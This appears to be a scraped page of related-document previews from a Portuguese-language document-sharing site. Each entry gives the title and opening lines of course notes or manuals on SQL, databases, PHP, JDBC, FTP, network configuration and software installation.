CONFIGURAÇÃO DE REDE SISTEMA IDEAGRI - FAQ CONCEITOS GERAIS Servidor: O servidor é todo computador no qual um banco de dados ou um programa (aplicação) está instalado e será COMPARTILHADO para outros computadores,
Leia maisManual de Instalação do Servidor Orion Phoenix Versão 1.0 - Novembro/2010
Manual de Instalação do Servidor Orion Phoenix Versão 1.0 - Novembro/2010 Manual de Instalação do Sistema Orion Phoenix 1.0 - Novembro/2010 Página 1 SUMÁRIO 1. INTRODUÇÃO...3 2. VISÃO GERAL...3 3. PROCEDIMENTOS
Leia maisBanco de Dados. Maurício Edgar Stivanello
Banco de Dados Maurício Edgar Stivanello Agenda Conceitos Básicos SGBD Projeto de Banco de Dados SQL Ferramentas Exemplo Dado e Informação Dado Fato do mundo real que está registrado e possui um significado
Leia maisSQL Procedural. Josino Rodrigues Neto josinon@gmail.com
SQL Procedural Josino Rodrigues Neto josinon@gmail.com SQL Procedural Agregada em SQL-92 As ferramentas têm nomes para suas linguagens SQL procedurais/embutidas Oracle : PL/SQL Postgres PL/Pgsql SQL Server
Leia maisCurso PHP Aula 08. Bruno Falcão brunogfalcao@gmail.com
+ Curso PHP Aula 08 Bruno Falcão brunogfalcao@gmail.com + Roteiro Conectividade com BD SQL + SQL Structured Query Language. Padrão para interagir com banco de dados relacionais. + Banco de dados Um banco
Leia maisCriando Banco de Dados, Tabelas e Campos através do HeidiSQL. Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011
Criando Banco de Dados, Tabelas e Campos através do HeidiSQL Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011 Edição 2 Pedreiros da Informação Criando Banco de Dados, Tabelas e Campos através do HeidiSQL
Leia maisManual do Usuário. E-DOC Peticionamento Eletrônico TST
E-DOC Peticionamento APRESENTAÇÃO O sistema E-DOC substituirá o atual sistema existente. Este sistema permitirá o controle de petições que utiliza certificado digital para autenticação de carga de documentos.
Leia maisFTP Protocolo de Transferência de Arquivos
FTP Protocolo de Transferência de Arquivos IFSC UNIDADE DE SÃO JOSÉ CURSO TÉCNICO SUBSEQUENTE DE TELECOMUNICAÇÕES! Prof. Tomás Grimm FTP - Protocolo O protocolo FTP é o serviço padrão da Internet para
Leia maisMódulo 6: Linguagem de Programação IV 6.1. Introdução 6.2. Bases de Dados 6.2.1. Visão Estrutural 6.2.2. SGBD: Sistema de Gestão de Bases de Dados
Curso Profissional de Técnico de Multimédia 12ºAno Disciplina: Sistemas de Informação Módulo 6: Linguagem de Programação IV 6.1. Introdução 6.2. Bases de Dados 6.2.1. Visão Estrutural 6.2.2. SGBD: Sistema
Leia maisApostila Delphi V 1.0
Preço: R$ 5,00 Link de download: setup.exe Tipo da licença: demonstração Limitações: perrmite visualizar até a página 12. Exige cadastro on-line para solicitar chave de registro. 1 / 7 Apostila completa
Leia mais8. Outros tipos de Transação (Modo de Transação de Autoconfirmação e Modo Implícito)
8. Outros tipos de Transação (Modo de Transação de Autoconfirmação e Modo Implícito) Nos itens anteriores vimos transações do tipo explícitas, ou seja, aquelas que iniciam com BEGIN TRANSACTION. As outras
Leia maisProgramação com Acesso a Banco de Dados
Campus Ipanguaçu Curso: Técnico em Informática Programação com Acesso a Banco de Dados AULA 17 ACESSO A BANCO DE DADOS COM JDBC PROF.: CLAYTON M. COSTA 2 011.2 Introdução Aplicação + Banco de Dados: Funcionalidade
Leia maiswww.victorpinheiro.jimdo.com www.victorpinheiro.jimdo.com
SERVIÇOS DE REDES DE COMPUTADORES Prof. Victor Guimarães Pinheiro/victor.tecnologo@gmail.com www.victorpinheiro.jimdo.com www.victorpinheiro.jimdo.com Modelo TCP/IP É o protocolo mais usado da atualidade
Leia maisESET Remote Administrator ESET EndPoint Solutions ESET Remote Adminstrator Workgroup Script de Logon
AGENDA 1. Download dos pacotes de instalação ESET Remote Administrator 2. Download dos pacotes de instalação ESET EndPoint Solutions 3. Procedimento de instalação e configuração básica do ESET Remote Adminstrator
Leia maisPHP (Seções, Cookies e Banco de Dados)
PHP (Seções, Cookies e Banco de Dados) André Tavares da Silva andre.silva@udesc.br Seções Basicamente, as seções são métodos que preservam determinados dados ativos enquanto o navegador do cliente estiver
Leia maisSegurança de Acesso a Banco de Dados no MS SQL Server
Segurança de Acesso a Banco de Dados no MS SQL Server Para efetuar com sucesso os exemplos que serão mostrados a seguir é necessário que exista no SQL Server uma pessoa que se conecte como Administrador,
Leia maisProgramação Orientada a Objetos JDBC Java Database Connectivity
Especialização em Engenharia de Software Programação Orientada a Objetos JDBC Java Database Connectivity Sérgio Soares scbs@cin.ufpe.br Objetivos Apresentar os conceitos básicos da especificação de Java
Leia maisTriggers em PostgreSQL. Linguagem de Programação de Banco de Dados. Triggers em PostgreSQL. Triggers em PostgreSQL
Prof. Ms. Luiz Alberto Contato: lasf.bel@gmail.com Linguagem de Programação de Banco de Dados Triggers em PostgreSQL Todos os bancos de dados comerciais possuem uma linguagem procedural auxiliar para a
Leia maisBases de Dados 2007/2008. Aula 8
Bases de Dados 2007/2008 Aula 8 1. T-SQL 2. VARIÁVEIS 3. CURSORES 4. PROCEDIMENTOS 5. EXERCÍCIOS Sumário Referências http://msdn2.microsoft.com/en-us/library/ms189826.aspx (linguagem t-sql) http://www.di.ubi.pt/~pprata/bd/bd0405-proc.sql
Leia mais2008.1. A linguagem SQL
SQL 2008.1 A linguagem SQL SQL - Structured Query Language. Foi definida nos laboratórios de pesquisa da IBM em San Jose, California, em 1974. Teve seus fundamentos no modelo relacional Sua primeira versão
Leia maisPROGRAMAÇÃO PARA DISPOSITIVOS MÓVEIS ARMAZENAMENTO EM BD NO DM. Prof. Angelo Augusto Frozza, M.Sc. http://about.me/tilfrozza
PROGRAMAÇÃO PARA DISPOSITIVOS MÓVEIS ARMAZENAMENTO EM BD NO DM Prof. Angelo Augusto Frozza, M.Sc. http://about.me/tilfrozza ROTEIRO Introdução App de exemplo Implementação do exemplo Testes realizados
Leia maisGERENCIADOR DE CORREIO ELETRÔNICO (V. 2 26/04/2010)
GERENCIADOR DE CORREIO ELETRÔNICO (V. 2 26/04/2010) OBJETIVO GERAL Este trabalho possui o objetivo de exercitar a lógica de programação dos alunos do Terceiro ano do Curso de BSI e também desenvolver aplicações
Leia mais